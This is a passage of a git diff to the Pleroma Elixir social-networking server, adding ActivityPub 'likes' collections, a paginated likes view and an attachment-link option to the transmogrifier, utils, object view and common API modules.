	{:ok, activity} <- ActivityPub.block(blocker, blocked, id, false) do
	User.unfollow(blocker, blocked)
	User.block(blocker, blocked)
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{
	"type" => "Undo",
	"object" => %{"type" => "Like", "object" => object_id},
	"actor" => _actor,
	"id" => id
	} = data
	) do
	with actor <- get_actor(data),
	%User{} = actor <- User.get_or_fetch_by_ap_id(actor),
	{:ok, object} <- get_obj_helper(object_id) \|\| fetch_obj_helper(object_id),
	{:ok, activity, _, _} <- ActivityPub.unlike(actor, object, id, false) do
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(_), do: :error

	def fetch_obj_helper(id) when is_bitstring(id), do: ActivityPub.fetch_object_from_id(id)
	def fetch_obj_helper(obj) when is_map(obj), do: ActivityPub.fetch_object_from_id(obj["id"])

	def get_obj_helper(id) do
	if object = Object.normalize(id), do: {:ok, object}, else: nil
	end

	def set_reply_to_uri(%{"inReplyTo" => inReplyTo} = object) do
	with false <- String.starts_with?(inReplyTo, "http"),
	{:ok, %{data: replied_to_object}} <- get_obj_helper(inReplyTo) do
	Map.put(object, "inReplyTo", replied_to_object["external_url"] \|\| inReplyTo)
	else
	_e -> object
	end
	end

	def set_reply_to_uri(obj), do: obj

	# Prepares the object of an outgoing create activity.
	def prepare_object(object) do
	object
	\|> set_sensitive
	\|> add_hashtags
	\|> add_mention_tags
	\|> add_emoji_tags
	\|> add_attributed_to
	+ \|> add_likes
	\|> prepare_attachments
	\|> set_conversation
	\|> set_reply_to_uri
	\|> strip_internal_fields
	\|> strip_internal_tags
	end

	# @doc
	# """
	# internal -> Mastodon
	# """

	- def prepare_outgoing(%{"type" => "Create", "object" => %{"type" => "Note"} = object} = data) do
	+ def prepare_outgoing(%{"type" => "Create", "object" => object} = data) do
	object =
	object
	\|> prepare_object

	data =
	data
	\|> Map.put("object", object)
	\|> Map.merge(Utils.make_json_ld_header())

	{:ok, data}
	end

	# Mastodon Accept/Reject requires a non-normalized object containing the actor URIs,
	# because of course it does.
	def prepare_outgoing(%{"type" => "Accept"} = data) do
	with follow_activity <- Activity.normalize(data["object"]) do
	object = %{
	"actor" => follow_activity.actor,
	"object" => follow_activity.data["object"],
	"id" => follow_activity.data["id"],
	"type" => "Follow"
	}

	data =
	data
	\|> Map.put("object", object)
	\|> Map.merge(Utils.make_json_ld_header())

	{:ok, data}
	end
	end

	def prepare_outgoing(%{"type" => "Reject"} = data) do
	with follow_activity <- Activity.normalize(data["object"]) do
	object = %{
	"actor" => follow_activity.actor,
	"object" => follow_activity.data["object"],
	"id" => follow_activity.data["id"],
	"type" => "Follow"
	}

	data =
	data
	\|> Map.put("object", object)
	\|> Map.merge(Utils.make_json_ld_header())

	{:ok, data}
	end
	end

	def prepare_outgoing(%{"type" => _type} = data) do
	data =
	data
	\|> maybe_fix_object_url
	\|> Map.merge(Utils.make_json_ld_header())

	{:ok, data}
	end

	def maybe_fix_object_url(data) do
	if is_binary(data["object"]) and not String.starts_with?(data["object"], "http") do
	case fetch_obj_helper(data["object"]) do
	{:ok, relative_object} ->
	if relative_object.data["external_url"] do
	_data =
	data
	\|> Map.put("object", relative_object.data["external_url"])
	else
	data
	end

	e ->
	Logger.error("Couldn't fetch #{data["object"]} #{inspect(e)}")
	data
	end
	else
	data
	end
	end

	def add_hashtags(object) do
	tags =
	(object["tag"] \|\| [])
	\|> Enum.map(fn tag ->
	%{
	"href" => Pleroma.Web.Endpoint.url() <> "/tags/#{tag}",
	"name" => "##{tag}",
	"type" => "Hashtag"
	}
	end)

	object
	\|> Map.put("tag", tags)
	end

	def add_mention_tags(object) do
	mentions =
	object
	\|> Utils.get_notified_from_object()
	\|> Enum.map(fn user ->
	%{"type" => "Mention", "href" => user.ap_id, "name" => "@#{user.nickname}"}
	end)

	tags = object["tag"] \|\| []

	object
	\|> Map.put("tag", tags ++ mentions)
	end

	# TODO: we should probably send mtime instead of unix epoch time for updated
	def add_emoji_tags(object) do
	tags = object["tag"] \|\| []
	emoji = object["emoji"] \|\| []

	out =
	emoji
	\|> Enum.map(fn {name, url} ->
	%{
	"icon" => %{"url" => url, "type" => "Image"},
	"name" => ":" <> name <> ":",
	"type" => "Emoji",
	"updated" => "1970-01-01T00:00:00Z",
	"id" => url
	}
	end)

	object
	\|> Map.put("tag", tags ++ out)
	end

	def set_conversation(object) do
	Map.put(object, "conversation", object["context"])
	end

	def set_sensitive(object) do
	tags = object["tag"] \|\| []
	Map.put(object, "sensitive", "nsfw" in tags)
	end

	def add_attributed_to(object) do
	attributedTo = object["attributedTo"] \|\| object["actor"]

	object
	\|> Map.put("attributedTo", attributedTo)
	end

	+ def add_likes(%{"id" => id, "like_count" => likes} = object) do
	+ likes = %{
	+ "id" => "#{id}/likes",
	+ "first" => "#{id}/likes?page=1",
	+ "type" => "OrderedCollection",
	+ "totalItems" => likes
	+ }
	+
	+ object
	+ \|> Map.put("likes", likes)
	+ end
	+
	+ def add_likes(object) do
	+ object
	+ end
	+
	def prepare_attachments(object) do
	attachments =
	(object["attachment"] \|\| [])
	\|> Enum.map(fn data ->
	[%{"mediaType" => media_type, "href" => href} \| _] = data["url"]
	%{"url" => href, "mediaType" => media_type, "name" => data["name"], "type" => "Document"}
	end)

	object
	\|> Map.put("attachment", attachments)
	end

	defp strip_internal_fields(object) do
	object
	\|> Map.drop([
	- "likes",
	"like_count",
	"announcements",
	"announcement_count",
	"emoji",
	"context_id"
	])
	end

	defp strip_internal_tags(%{"tag" => tags} = object) do
	tags =
	tags
	\|> Enum.filter(fn x -> is_map(x) end)

	object
	\|> Map.put("tag", tags)
	end

	defp strip_internal_tags(object), do: object

	defp user_upgrade_task(user) do
	old_follower_address = User.ap_followers(user)

	q =
	from(
	u in User,
	where: ^old_follower_address in u.following,
	update: [
	set: [
	following:
	fragment(
	"array_replace(?,?,?)",
	u.following,
	^old_follower_address,
	^user.follower_address
	)
	]
	]
	)

	Repo.update_all(q, [])

	maybe_retire_websub(user.ap_id)

	# Only do this for recent activties, don't go through the whole db.
	# Only look at the last 1000 activities.
	since = (Repo.aggregate(Activity, :max, :id) \|\| 0) - 1_000

	q =
	from(
	a in Activity,
	where: ^old_follower_address in a.recipients,
	where: a.id > ^since,
	update: [
	set: [
	recipients:
	fragment(
	"array_replace(?,?,?)",
	a.recipients,
	^old_follower_address,
	^user.follower_address
	)
	]
	]
	)

	Repo.update_all(q, [])
	end

	def upgrade_user_from_ap_id(ap_id, async \\ true) do
	with %User{local: false} = user <- User.get_by_ap_id(ap_id),
	{:ok, data} <- ActivityPub.fetch_and_prepare_user_from_ap_id(ap_id) do
	already_ap = User.ap_enabled?(user)

	{:ok, user} =
	User.upgrade_changeset(user, data)
	\|> Repo.update()

	if !already_ap do
	# This could potentially take a long time, do it in the background
	if async do
	Task.start(fn ->
	user_upgrade_task(user)
	end)
	else
	user_upgrade_task(user)
	end
	end

	{:ok, user}
	else
	e -> e
	end
	end

	def maybe_retire_websub(ap_id) do
	# some sanity checks
	if is_binary(ap_id) && String.length(ap_id) > 8 do
	q =
	from(
	ws in Pleroma.Web.Websub.WebsubClientSubscription,
	where: fragment("? like ?", ws.topic, ^"#{ap_id}%")
	)

	Repo.delete_all(q)
	end
	end

	def maybe_fix_user_url(data) do
	if is_map(data["url"]) do
	Map.put(data, "url", data["url"]["href"])
	else
	data
	end
	end

	def maybe_fix_user_object(data) do
	data
	\|> maybe_fix_user_url
	end
	end
	diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
	index b313996db..6ecab773c 100644
	--- a/lib/pleroma/web/activity_pub/utils.ex
	+++ b/lib/pleroma/web/activity_pub/utils.ex
	@@ -1,537 +1,558 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.Utils do
	alias Pleroma.{Repo, Web, Object, Activity, User, Notification}
	alias Pleroma.Web.Router.Helpers
	alias Pleroma.Web.Endpoint
	alias Ecto.{Changeset, UUID}
	import Ecto.Query
	require Logger

	@supported_object_types ["Article", "Note", "Video", "Page"]

	# Some implementations send the actor URI as the actor field, others send the entire actor object,
	# so figure out what the actor's URI is based on what we have.
	def get_ap_id(object) do
	case object do
	%{"id" => id} -> id
	id -> id
	end
	end

	def normalize_params(params) do
	Map.put(params, "actor", get_ap_id(params["actor"]))
	end

	defp recipient_in_collection(ap_id, coll) when is_binary(coll), do: ap_id == coll
	defp recipient_in_collection(ap_id, coll) when is_list(coll), do: ap_id in coll
	defp recipient_in_collection(_, _), do: false

	def recipient_in_message(ap_id, params) do
	cond do
	recipient_in_collection(ap_id, params["to"]) ->
	true

	recipient_in_collection(ap_id, params["cc"]) ->
	true

	recipient_in_collection(ap_id, params["bto"]) ->
	true

	recipient_in_collection(ap_id, params["bcc"]) ->
	true

	# if the message is unaddressed at all, then assume it is directly addressed
	# to the recipient
	!params["to"] && !params["cc"] && !params["bto"] && !params["bcc"] ->
	true

	true ->
	false
	end
	end

	defp extract_list(target) when is_binary(target), do: [target]
	defp extract_list(lst) when is_list(lst), do: lst
	defp extract_list(_), do: []

	def maybe_splice_recipient(ap_id, params) do
	need_splice =
	!recipient_in_collection(ap_id, params["to"]) &&
	!recipient_in_collection(ap_id, params["cc"])

	cc_list = extract_list(params["cc"])

	if need_splice do
	params
	\|> Map.put("cc", [ap_id \| cc_list])
	else
	params
	end
	end

	def make_json_ld_header do
	%{
	"@context" => [
	"https://www.w3.org/ns/activitystreams",
	"#{Web.base_url()}/schemas/litepub-0.1.jsonld"
	]
	}
	end

	def make_date do
	DateTime.utc_now() \|> DateTime.to_iso8601()
	end

	def generate_activity_id do
	generate_id("activities")
	end

	def generate_context_id do
	generate_id("contexts")
	end

	def generate_object_id do
	Helpers.o_status_url(Endpoint, :object, UUID.generate())
	end

	def generate_id(type) do
	"#{Web.base_url()}/#{type}/#{UUID.generate()}"
	end

	def get_notified_from_object(%{"type" => type} = object) when type in @supported_object_types do
	fake_create_activity = %{
	"to" => object["to"],
	"cc" => object["cc"],
	"type" => "Create",
	"object" => object
	}

	Notification.get_notified_from_activity(%Activity{data: fake_create_activity}, false)
	end

	def get_notified_from_object(object) do
	Notification.get_notified_from_activity(%Activity{data: object}, false)
	end

	def create_context(context) do
	context = context \|\| generate_id("contexts")
	changeset = Object.context_mapping(context)

	case Repo.insert(changeset) do
	{:ok, object} ->
	object

	# This should be solved by an upsert, but it seems ecto
	# has problems accessing the constraint inside the jsonb.
	{:error, _} ->
	Object.get_cached_by_ap_id(context)
	end
	end

	@doc """
	Enqueues an activity for federation if it's local
	"""
	def maybe_federate(%Activity{local: true} = activity) do
	priority =
	case activity.data["type"] do
	"Delete" -> 10
	"Create" -> 1
	_ -> 5
	end

	Pleroma.Web.Federator.enqueue(:publish, activity, priority)
	:ok
	end

	def maybe_federate(_), do: :ok

	@doc """
	Adds an id and a published data if they aren't there,
	also adds it to an included object
	"""
	def lazy_put_activity_defaults(map) do
	%{data: %{"id" => context}, id: context_id} = create_context(map["context"])

	map =
	map
	\|> Map.put_new_lazy("id", &generate_activity_id/0)
	\|> Map.put_new_lazy("published", &make_date/0)
	\|> Map.put_new("context", context)
	\|> Map.put_new("context_id", context_id)

	if is_map(map["object"]) do
	object = lazy_put_object_defaults(map["object"], map)
	%{map \| "object" => object}
	else
	map
	end
	end

	@doc """
	Adds an id and published date if they aren't there.
	"""
	def lazy_put_object_defaults(map, activity \\ %{}) do
	map
	\|> Map.put_new_lazy("id", &generate_object_id/0)
	\|> Map.put_new_lazy("published", &make_date/0)
	\|> Map.put_new("context", activity["context"])
	\|> Map.put_new("context_id", activity["context_id"])
	end

	@doc """
	Inserts a full object if it is contained in an activity.
	"""
	def insert_full_object(%{"object" => %{"type" => type} = object_data})
	when is_map(object_data) and type in @supported_object_types do
	with {:ok, _} <- Object.create(object_data) do
	:ok
	end
	end

	def insert_full_object(_), do: :ok

	def update_object_in_activities(%{data: %{"id" => id}} = object) do
	# TODO
	# Update activities that already had this. Could be done in a seperate process.
	# Alternatively, just don't do this and fetch the current object each time. Most
	# could probably be taken from cache.
	relevant_activities = Activity.all_by_object_ap_id(id)

	Enum.map(relevant_activities, fn activity ->
	new_activity_data = activity.data \|> Map.put("object", object.data)
	changeset = Changeset.change(activity, data: new_activity_data)
	Repo.update(changeset)
	end)
	end

	#### Like-related helpers

	@doc """
	Returns an existing like if a user already liked an object
	"""
	def get_existing_like(actor, %{data: %{"id" => id}}) do
	query =
	from(
	activity in Activity,
	where: fragment("(?)->>'actor' = ?", activity.data, ^actor),
	# this is to use the index
	where:
	fragment(
	"coalesce((?)->'object'->>'id', (?)->>'object') = ?",
	activity.data,
	activity.data,
	^id
	),
	where: fragment("(?)->>'type' = 'Like'", activity.data)
	)

	Repo.one(query)
	end

	+ @doc """
	+ Returns like activities targeting an object
	+ """
	+ def get_object_likes(%{data: %{"id" => id}}) do
	+ query =
	+ from(
	+ activity in Activity,
	+ # this is to use the index
	+ where:
	+ fragment(
	+ "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
	+ activity.data,
	+ activity.data,
	+ ^id
	+ ),
	+ where: fragment("(?)->>'type' = 'Like'", activity.data)
	+ )
	+
	+ Repo.all(query)
	+ end
	+
	def make_like_data(%User{ap_id: ap_id} = actor, %{data: %{"id" => id}} = object, activity_id) do
	data = %{
	"type" => "Like",
	"actor" => ap_id,
	"object" => id,
	"to" => [actor.follower_address, object.data["actor"]],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"context" => object.data["context"]
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	def update_element_in_object(property, element, object) do
	with new_data <-
	object.data
	\|> Map.put("#{property}_count", length(element))
	\|> Map.put("#{property}s", element),
	changeset <- Changeset.change(object, data: new_data),
	{:ok, object} <- Repo.update(changeset),
	_ <- update_object_in_activities(object) do
	{:ok, object}
	end
	end

	def update_likes_in_object(likes, object) do
	update_element_in_object("like", likes, object)
	end

	def add_like_to_object(%Activity{data: %{"actor" => actor}}, object) do
	likes = if is_list(object.data["likes"]), do: object.data["likes"], else: []

	with likes <- [actor \| likes] \|> Enum.uniq() do
	update_likes_in_object(likes, object)
	end
	end

	def remove_like_from_object(%Activity{data: %{"actor" => actor}}, object) do
	likes = if is_list(object.data["likes"]), do: object.data["likes"], else: []

	with likes <- likes \|> List.delete(actor) do
	update_likes_in_object(likes, object)
	end
	end

	#### Follow-related helpers

	@doc """
	Updates a follow activity's state (for locked accounts).
	"""
	def update_follow_state(%Activity{} = activity, state) do
	with new_data <-
	activity.data
	\|> Map.put("state", state),
	changeset <- Changeset.change(activity, data: new_data),
	{:ok, activity} <- Repo.update(changeset) do
	{:ok, activity}
	end
	end

	@doc """
	Makes a follow activity data for the given follower and followed
	"""
	def make_follow_data(
	%User{ap_id: follower_id},
	%User{ap_id: followed_id} = _followed,
	activity_id
	) do
	data = %{
	"type" => "Follow",
	"actor" => follower_id,
	"to" => [followed_id],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"object" => followed_id,
	"state" => "pending"
	}

	data = if activity_id, do: Map.put(data, "id", activity_id), else: data

	data
	end

	def fetch_latest_follow(%User{ap_id: follower_id}, %User{ap_id: followed_id}) do
	query =
	from(
	activity in Activity,
	where:
	fragment(
	"? ->> 'type' = 'Follow'",
	activity.data
	),
	where: activity.actor == ^follower_id,
	where:
	fragment(
	"? @> ?",
	activity.data,
	^%{object: followed_id}
	),
	order_by: [desc: :id],
	limit: 1
	)

	Repo.one(query)
	end

	#### Announce-related helpers

	@doc """
	Retruns an existing announce activity if the notice has already been announced
	"""
	def get_existing_announce(actor, %{data: %{"id" => id}}) do
	query =
	from(
	activity in Activity,
	where: activity.actor == ^actor,
	# this is to use the index
	where:
	fragment(
	"coalesce((?)->'object'->>'id', (?)->>'object') = ?",
	activity.data,
	activity.data,
	^id
	),
	where: fragment("(?)->>'type' = 'Announce'", activity.data)
	)

	Repo.one(query)
	end

	@doc """
	Make announce activity data for the given actor and object
	"""
	# for relayed messages, we only want to send to subscribers
	def make_announce_data(
	%User{ap_id: ap_id, nickname: nil} = user,
	%Object{data: %{"id" => id}} = object,
	activity_id
	) do
	data = %{
	"type" => "Announce",
	"actor" => ap_id,
	"object" => id,
	"to" => [user.follower_address],
	"cc" => [],
	"context" => object.data["context"]
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	def make_announce_data(
	%User{ap_id: ap_id} = user,
	%Object{data: %{"id" => id}} = object,
	activity_id
	) do
	data = %{
	"type" => "Announce",
	"actor" => ap_id,
	"object" => id,
	"to" => [user.follower_address, object.data["actor"]],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"context" => object.data["context"]
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	@doc """
	Make unannounce activity data for the given actor and object
	"""
	def make_unannounce_data(
	%User{ap_id: ap_id} = user,
	%Activity{data: %{"context" => context}} = activity,
	activity_id
	) do
	data = %{
	"type" => "Undo",
	"actor" => ap_id,
	"object" => activity.data,
	"to" => [user.follower_address, activity.data["actor"]],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"context" => context
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	def make_unlike_data(
	%User{ap_id: ap_id} = user,
	%Activity{data: %{"context" => context}} = activity,
	activity_id
	) do
	data = %{
	"type" => "Undo",
	"actor" => ap_id,
	"object" => activity.data,
	"to" => [user.follower_address, activity.data["actor"]],
	"cc" => ["https://www.w3.org/ns/activitystreams#Public"],
	"context" => context
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	def add_announce_to_object(
	%Activity{
	data: %{"actor" => actor, "cc" => ["https://www.w3.org/ns/activitystreams#Public"]}
	},
	object
	) do
	announcements =
	if is_list(object.data["announcements"]), do: object.data["announcements"], else: []

	with announcements <- [actor \| announcements] \|> Enum.uniq() do
	update_element_in_object("announcement", announcements, object)
	end
	end

	def add_announce_to_object(_, object), do: {:ok, object}

	def remove_announce_from_object(%Activity{data: %{"actor" => actor}}, object) do
	announcements =
	if is_list(object.data["announcements"]), do: object.data["announcements"], else: []

	with announcements <- announcements \|> List.delete(actor) do
	update_element_in_object("announcement", announcements, object)
	end
	end

	#### Unfollow-related helpers

	def make_unfollow_data(follower, followed, follow_activity, activity_id) do
	data = %{
	"type" => "Undo",
	"actor" => follower.ap_id,
	"to" => [followed.ap_id],
	"object" => follow_activity.data
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	#### Block-related helpers
	def fetch_latest_block(%User{ap_id: blocker_id}, %User{ap_id: blocked_id}) do
	query =
	from(
	activity in Activity,
	where:
	fragment(
	"? ->> 'type' = 'Block'",
	activity.data
	),
	where: activity.actor == ^blocker_id,
	where:
	fragment(
	"? @> ?",
	activity.data,
	^%{object: blocked_id}
	),
	order_by: [desc: :id],
	limit: 1
	)

	Repo.one(query)
	end

	def make_block_data(blocker, blocked, activity_id) do
	data = %{
	"type" => "Block",
	"actor" => blocker.ap_id,
	"to" => [blocked.ap_id],
	"object" => blocked.ap_id
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	def make_unblock_data(blocker, blocked, block_activity, activity_id) do
	data = %{
	"type" => "Undo",
	"actor" => blocker.ap_id,
	"to" => [blocked.ap_id],
	"object" => block_activity.data
	}

	if activity_id, do: Map.put(data, "id", activity_id), else: data
	end

	#### Create-related helpers

	def make_create_data(params, additional) do
	published = params.published \|\| make_date()

	%{
	"type" => "Create",
	"to" => params.to \|> Enum.uniq(),
	"actor" => params.actor.ap_id,
	"object" => params.object,
	"published" => published,
	"context" => params.context
	}
	\|> Map.merge(additional)
	end
	end
	diff --git a/lib/pleroma/web/activity_pub/views/object_view.ex b/lib/pleroma/web/activity_pub/views/object_view.ex
	index b5c9bf8d0..394d82fbc 100644
	--- a/lib/pleroma/web/activity_pub/views/object_view.ex
	+++ b/lib/pleroma/web/activity_pub/views/object_view.ex
	@@ -1,38 +1,72 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.ObjectView do
	use Pleroma.Web, :view
	alias Pleroma.{Object, Activity}
	alias Pleroma.Web.ActivityPub.Transmogrifier

	def render("object.json", %{object: %Object{} = object}) do
	base = Pleroma.Web.ActivityPub.Utils.make_json_ld_header()

	additional = Transmogrifier.prepare_object(object.data)
	Map.merge(base, additional)
	end

	def render("object.json", %{object: %Activity{data: %{"type" => "Create"}} = activity}) do
	base = Pleroma.Web.ActivityPub.Utils.make_json_ld_header()
	object = Object.normalize(activity.data["object"])

	additional =
	Transmogrifier.prepare_object(activity.data)
	\|> Map.put("object", Transmogrifier.prepare_object(object.data))

	Map.merge(base, additional)
	end

	def render("object.json", %{object: %Activity{} = activity}) do
	base = Pleroma.Web.ActivityPub.Utils.make_json_ld_header()
	object = Object.normalize(activity.data["object"])

	additional =
	Transmogrifier.prepare_object(activity.data)
	\|> Map.put("object", object.data["id"])

	Map.merge(base, additional)
	end
	+
	+ def render("likes.json", ap_id, likes, page) do
	+ collection(likes, "#{ap_id}/likes", page)
	+ \|> Map.merge(Pleroma.Web.ActivityPub.Utils.make_json_ld_header())
	+ end
	+
	+ def render("likes.json", ap_id, likes) do
	+ %{
	+ "id" => "#{ap_id}/likes",
	+ "type" => "OrderedCollection",
	+ "totalItems" => length(likes),
	+ "first" => collection(likes, "#{ap_id}/likes", 1)
	+ }
	+ \|> Map.merge(Pleroma.Web.ActivityPub.Utils.make_json_ld_header())
	+ end
	+
	+ def collection(collection, iri, page) do
	+ offset = (page - 1) * 10
	+ items = Enum.slice(collection, offset, 10)
	+ items = Enum.map(items, fn object -> Transmogrifier.prepare_object(object.data) end)
	+ total = length(collection)
	+
	+ map = %{
	+ "id" => "#{iri}?page=#{page}",
	+ "type" => "OrderedCollectionPage",
	+ "partOf" => iri,
	+ "totalItems" => total,
	+ "orderedItems" => items
	+ }
	+
	+ if offset < total do
	+ Map.put(map, "next", "#{iri}?page=#{page + 1}")
	+ end
	+ end
	end
	diff --git a/lib/pleroma/web/common_api/common_api.ex b/lib/pleroma/web/common_api/common_api.ex
	index 9a748d65e..504670439 100644
	--- a/lib/pleroma/web/common_api/common_api.ex
	+++ b/lib/pleroma/web/common_api/common_api.ex
	@@ -1,212 +1,219 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.CommonAPI do
	alias Pleroma.{User, Repo, Activity, Object}
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.ActivityPub.Utils
	alias Pleroma.Formatter

	import Pleroma.Web.CommonAPI.Utils

	def delete(activity_id, user) do
	with %Activity{data: %{"object" => %{"id" => object_id}}} <- Repo.get(Activity, activity_id),
	%Object{} = object <- Object.normalize(object_id),
	true <- user.info.is_moderator \|\| user.ap_id == object.data["actor"],
	{:ok, _} <- unpin(activity_id, user),
	{:ok, delete} <- ActivityPub.delete(object) do
	{:ok, delete}
	end
	end

	def repeat(id_or_ap_id, user) do
	with %Activity{} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	object <- Object.normalize(activity.data["object"]["id"]),
	nil <- Utils.get_existing_announce(user.ap_id, object) do
	ActivityPub.announce(user, object)
	else
	_ ->
	{:error, "Could not repeat"}
	end
	end

	def unrepeat(id_or_ap_id, user) do
	with %Activity{} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	object <- Object.normalize(activity.data["object"]["id"]) do
	ActivityPub.unannounce(user, object)
	else
	_ ->
	{:error, "Could not unrepeat"}
	end
	end

	def favorite(id_or_ap_id, user) do
	with %Activity{} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	object <- Object.normalize(activity.data["object"]["id"]),
	nil <- Utils.get_existing_like(user.ap_id, object) do
	ActivityPub.like(user, object)
	else
	_ ->
	{:error, "Could not favorite"}
	end
	end

	def unfavorite(id_or_ap_id, user) do
	with %Activity{} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	object <- Object.normalize(activity.data["object"]["id"]) do
	ActivityPub.unlike(user, object)
	else
	_ ->
	{:error, "Could not unfavorite"}
	end
	end

	def get_visibility(%{"visibility" => visibility})
	when visibility in ~w{public unlisted private direct},
	do: visibility

	def get_visibility(%{"in_reply_to_status_id" => status_id}) when not is_nil(status_id) do
	case get_replied_to_activity(status_id) do
	nil ->
	"public"

	inReplyTo ->
	Pleroma.Web.MastodonAPI.StatusView.get_visibility(inReplyTo.data["object"])
	end
	end

	def get_visibility(_), do: "public"

	defp get_content_type(content_type) do
	if Enum.member?(Pleroma.Config.get([:instance, :allowed_post_formats]), content_type) do
	content_type
	else
	"text/plain"
	end
	end

	def post(user, %{"status" => status} = data) do
	visibility = get_visibility(data)
	limit = Pleroma.Config.get([:instance, :limit])

	with status <- String.trim(status),
	attachments <- attachments_from_ids(data["media_ids"]),
	mentions <- Formatter.parse_mentions(status),
	inReplyTo <- get_replied_to_activity(data["in_reply_to_status_id"]),
	{to, cc} <- to_for_user_and_mentions(user, mentions, inReplyTo, visibility),
	tags <- Formatter.parse_tags(status, data),
	content_html <-
	make_content_html(
	status,
	mentions,
	attachments,
	tags,
	get_content_type(data["content_type"]),
	- true
	+ Enum.member?(
	+ [true, "true"],
	+ Map.get(
	+ data,
	+ "no_attachment_links",
	+ Pleroma.Config.get([:instance, :no_attachment_links], false)
	+ )
	+ )
	),
	context <- make_context(inReplyTo),
	cw <- data["spoiler_text"],
	full_payload <- String.trim(status <> (data["spoiler_text"] \|\| "")),
	length when length in 1..limit <- String.length(full_payload),
	object <-
	make_note_data(
	user.ap_id,
	to,
	context,
	content_html,
	attachments,
	inReplyTo,
	tags,
	cw,
	cc
	),
	object <-
	Map.put(
	object,
	"emoji",
	(Formatter.get_emoji(status) ++ Formatter.get_emoji(data["spoiler_text"]))
	\|> Enum.reduce(%{}, fn {name, file}, acc ->
	Map.put(acc, name, "#{Pleroma.Web.Endpoint.static_url()}#{file}")
	end)
	) do
	res =
	ActivityPub.create(%{
	to: to,
	actor: user,
	context: context,
	object: object,
	additional: %{"cc" => cc}
	})

	res
	end
	end

	# Updates the emojis for a user based on their profile
	def update(user) do
	user =
	with emoji <- emoji_from_profile(user),
	source_data <- (user.info.source_data \|\| %{}) \|> Map.put("tag", emoji),
	info_cng <- Pleroma.User.Info.set_source_data(user.info, source_data),
	change <- Ecto.Changeset.change(user) \|> Ecto.Changeset.put_embed(:info, info_cng),
	{:ok, user} <- User.update_and_set_cache(change) do
	user
	else
	_e ->
	user
	end

	ActivityPub.update(%{
	local: true,
	to: [user.follower_address],
	cc: [],
	actor: user.ap_id,
	object: Pleroma.Web.ActivityPub.UserView.render("user.json", %{user: user})
	})
	end

	def pin(id_or_ap_id, %{ap_id: user_ap_id} = user) do
	with %Activity{
	actor: ^user_ap_id,
	data: %{
	"type" => "Create",
	"object" => %{
	"to" => object_to,
	"type" => "Note"
	}
	}
	} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	true <- Enum.member?(object_to, "https://www.w3.org/ns/activitystreams#Public"),
	%{valid?: true} = info_changeset <-
	Pleroma.User.Info.add_pinnned_activity(user.info, activity),
	changeset <-
	Ecto.Changeset.change(user) \|> Ecto.Changeset.put_embed(:info, info_changeset),
	{:ok, _user} <- User.update_and_set_cache(changeset) do
	{:ok, activity}
	else
	%{errors: [pinned_activities: {err, _}]} ->
	{:error, err}

	_ ->
	{:error, "Could not pin"}
	end
	end

	def unpin(id_or_ap_id, user) do
	with %Activity{} = activity <- get_by_id_or_ap_id(id_or_ap_id),
	%{valid?: true} = info_changeset <-
	Pleroma.User.Info.remove_pinnned_activity(user.info, activity),
	changeset <-
	Ecto.Changeset.change(user) \|> Ecto.Changeset.put_embed(:info, info_changeset),
	{:ok, _user} <- User.update_and_set_cache(changeset) do
	{:ok, activity}
	else
	%{errors: [pinned_activities: {err, _}]} ->
	{:error, err}

	_ ->
	{:error, "Could not unpin"}
	end
	end
	end
	diff --git a/lib/pleroma/web/mastodon_api/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/mastodon_api_controller.ex
	index e00a3fb87..daad89185 100644
	--- a/lib/pleroma/web/mastodon_api/mastodon_api_controller.ex
	+++ b/lib/pleroma/web/mastodon_api/mastodon_api_controller.ex
	@@ -1,1344 +1,1344 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
	use Pleroma.Web, :controller
	alias Pleroma.{Repo, Object, Activity, User, Notification, Stats}
	alias Pleroma.Web

	alias Pleroma.Web.MastodonAPI.{
	StatusView,
	AccountView,
	MastodonView,
	ListView,
	FilterView,
	PushSubscriptionView
	}

	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.ActivityPub.Utils
	alias Pleroma.Web.CommonAPI
	alias Pleroma.Web.OAuth.{Authorization, Token, App}
	alias Pleroma.Web.MediaProxy

	import Ecto.Query
	require Logger

	@httpoison Application.get_env(:pleroma, :httpoison)

	action_fallback(:errors)

	def create_app(conn, params) do
	with cs <- App.register_changeset(%App{}, params) \|> IO.inspect(),
	{:ok, app} <- Repo.insert(cs) \|> IO.inspect() do
	res = %{
	id: app.id \|> to_string,
	name: app.client_name,
	client_id: app.client_id,
	client_secret: app.client_secret,
	redirect_uri: app.redirect_uris,
	website: app.website
	}

